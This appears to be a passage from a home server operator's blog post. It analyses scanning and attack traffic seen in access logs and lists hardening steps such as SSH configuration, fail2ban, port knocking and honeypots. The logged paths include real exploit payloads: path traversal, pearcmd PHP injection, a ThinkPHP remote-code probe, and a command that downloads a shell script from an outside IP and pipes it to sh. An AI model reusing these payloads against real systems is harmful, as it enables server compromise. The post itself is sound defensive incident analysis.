/index.php?lang=../../../../../../../../tmp/index1
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/var/tmp/index1.php
/index.php?lang=../../../../../../../../var/tmp/index1
/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=curl%20http%3A%2F%2F193.222.96.163%2Foy.sh%20%7C%20sh%20%7C%7C%20wget%20-O-%20http%3A%2F%2F193.222.96.163%2Foy.sh%20%7C%20sh
/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
/index.pl
/index.shtml
/indice.asp
/indice.cgi
/indice.php
/info.php
/inicio.asp
/inicio.aspx
/inicio.cfm
/inicio.cgi
/inicio.html
/inicio.jhtml
/inicio.jsa
/inicio.jsp
/inicio.pl
/inicio.shtml
/IUHv
/js/core/merged-template-prepend.js?v=25c82ac8-0
/js/NewWindow_2_all.js
/localstart.asp
/localstart.cgi
/localstart.html
/localstart.jsp
/localstart.pl
/login
//login_sid.lua
/lQh7
/main.aspx
/main.cfm
/main.cgi
/main.html
/main.jsa
/main.jsp
/main.php
/main.pl
/manager/html
/menu.asp
/menu.aspx
/menu.cfm
/menu.cgi
/menu.jsa
/menu.pl
/menu.shtml
/nmaplowercheck1705366811
/nmaplowercheck1708010920
/nmaplowercheck1708926927
/nmaplowercheck1709036299
/nmaplowercheck1709780754
/nmaplowercheck1710329610
/nmaplowercheck1710989122
/nmaplowercheck1711144394
/OA_HTML/FrmReportData
/ocs/v2.php/cloud/capabilities
/ocs/v2.php/cloud/capabilities?
/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
/pools
/pools/default/buckets
/Portal0000.htm
/Portal/Portal.mwsl
/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
/RDWeb/Pages/en-US/login.aspx
/readme.txt
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/remote/login
/remote/login?lang=en
/remote/login/remote/login
/Res/login.html
/rest/applinks/1.0/manifest
/robots.txt
/server-status
/SetupWizard.aspx/vPhXAqofQJ
/showLogin.cc
/sitecore/shell/sitecore.version.xml
/sitemap.xml
/.sqlmap
/sqlmap
/sslvpn/js/login.js
/sslvpnLogin.html
/sslvpn_logon.shtml
/start.asp
/start.aspx
/start.cfm
/start.html
/start.jsa
/start.jsp
/start.php
/STdQ
/telescope/requests
/Tin1
/version
/vpn/index.html
/webtools/control/ping?USERNAME=&PASSWORD=&requirePasswordChange=Y
/.well-known/security.txt
/?XDEBUG_SESSION_START=phpstorm
/yms/fileserver/customize/default/web_bg.jpg
/yms/fileserver/customize/default/web_favicon.ico
/zabbix/favicon.ico
/zy/api/i.js
/zy/api/k.jsAttempted ThinkPHP Exploitation
An interesting one is
/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=curl%20http%3A%2F%2F193.222.96.163%2Foy.sh%20%7C%20sh%20%7C%7C%20wget%20-O-%20http%3A%2F%2F193.222.96.163%2Foy.sh%20%7C%20sh
it translates to, either with curl or wget, downloading a script
http://193.222.96.163/oy.sh
and directly running that with sh.
It looks like an attempted exploitation of this bug [4] in the ThinkPHP framework.
NextCloud Username Leakage
Also concering is this section:
/index.php/avatar/<redacted: username 1>/45
/index.php/avatar/<redacted: username 2>/45?
/index.php/avatar/<redacted: username 2>/45
/index.php/avatar/<redacted: username 2>/45?
If these access attempts didn’t come from our own clients roaming aborad, in public Wifi, friends Wifi or the cellular service - I’m not sure about that anymore - then a bot figured out the usernames on the NextCloud instance.
As usernames are often the same across services on the same server that would make brute-forcing the username/password combination on the SSH server a lot easier by using the known usernames that were previously exfiltrated from Nextcloud.
Though I’m not sure in my case it seems that this behaviour of NextCloud is known. In an issue [5] from a year ago (April, 2022) a user mentions being able to brute-force NextCloud usernames and accessing a user information page.
such as http://<server-ip>/index.php/u/test
There is a configuration option to disable this.
https://docs.nextcloud.com/server/latest/admin_manual/configuration_user/profile_configuration.html
As web servers don’t consider GET-requests to be failed login attempts, an attacker could much more easily, quickly and without risking being blocked all too easily, bruteforce the username from Nextcloud and then use that username in a many times more effective bruteforce attack using the known usernames against the SSH server.
Monitoring the Internet connection
Some time ago I’ve installed this extension [6] to the Wireshark packet analyzer that lets me monitor incoming and outgoing traffic directly at my internet router.
Assuming the router hasn’t been infiltrated I can be sure to detect traffic from my systems even if they were infiltrated with rootkits.
Mitigation
Next we need to make sure this stops.
Take the Server offline
After registering the attacks I’ve closed the port on my router and shut down the ssh server
sudo systemctl stop ssh
sudo systemctl disable ssh
Harden Configuration
Luckily in best principes I’ve already set up the SSH-Server to deny all password logins, accept only logins with certificate, I’ve disabled root login and set max retries to a low number.
Had I allowed user login and had the user/password combination been in a password list, the attacker would have likely gained access.
cat /etc/ssh/sshd_config
PermitRootLogin no
MaxAuthTries 3
LoginGraceTime 20
PermitEmptyPasswords no
PasswordAuthentication no
ChallengeResponseAuthentication no
KerberosAuthentication no
GSSAPIAuthentication no
X11Forwarding no
AllowAgentForwarding no
AllowTcpForwarding no
PermitTunnel no
DebianBanner no
Keep Software up to date
An additional less likely attack vector are old vulnerable versions of the SSH-Server that contain exploitable security flaws.
So far 8.4p1 seems to hold up.
OpenSSH_8.4p1 Debian-5+deb11u1, OpenSSL 1.1.1w 11 Sep 2023
Note that certificate-based logins can also be dangerous if an attacker gains access to one vulnerable system. The “SSH-Snake” [3] will hop from system to system by using the available SSH certificates found on compromised systems. It leaves hardly any traces by running only in memory, under the assumption that servers don’t get rebootet often. It doesn’t write to disk and automatically wipes logs.
Advanced Protection
These coordinated automated attacks by botnets are very well known and there are papers about it [1]. There are a number of well-known protective measures we can take to harden our servers.
Fail2Ban
Fail2Ban is a Python tool that scans access logs and automatically adds all IP-Adresses that have multiple failed login attempts to the hosts.deny list or blocks them with iptables.
This is simple to implement, very common and effective protection.
knockd
The knockd opens multipe ports without any service behind them. When connecting to the open ports in a specified order, the “knocking sequence”, it will open the actual service it protects to only that one single IP-Adress that has knocked in the correct serquence.
This is highly effective, but means that legitimite users need to run a knock sequence before connecting.
In my view a well configured SSH-Server is probably just as safe - whether you’re brute-forcing a long password or a knocking sequence shouldn’t make much difference. Though is an additional element of “security through obscurity”. A knock daemon can add protection and it’s defintely advised for less protected server daemons - say you absolutely need to run that unencrypted FTP daemon -, but then you should probably be tunneling the connection via SSH or VPN in the first place.
honeyd
Honeyd is a daemon that makes your server appear like hundreds of servers. Assuming legitimit users only connect to known real servers they should never come in contact with a fake server. So as soon as an attacker scans for services and contacts fake servers, Honeyd will notice and the attacker can be detected.
Honeypots
Honeypots are servers that masquerade as real servers, but either slow down the attacker or drop them into sandboxes and monitor their actions. This is crucial for malware analysis. Examples are Cowrie [2], Kippo [3] and so on.
Of course you can also set up a real server with weakend security on an isolated subnet as a dedicated honeybot.
Progress
Conclusion
By setting up a strong SSH configuration, fail2ban, taking the server offline and checking logfiles and monitoring activity at my router I can be sure no intruder was able to access my network.
But the shear amount of networking scanning and brute-forcing activity as sparked my interest. Next time I’ll set up a honeypot.
1] https://netsec.ethz.ch/publications/papers/passwords15-abdou.pdf 2] https://github.com/cowrie/cowrie 3] https://github.com/desaster/kippo 4] https://nvd.nist.gov/vuln/detail/CVE-2022-47945 5] https://help.nextcloud.com/t/user-information-leakage-in-23-0-3/137304/2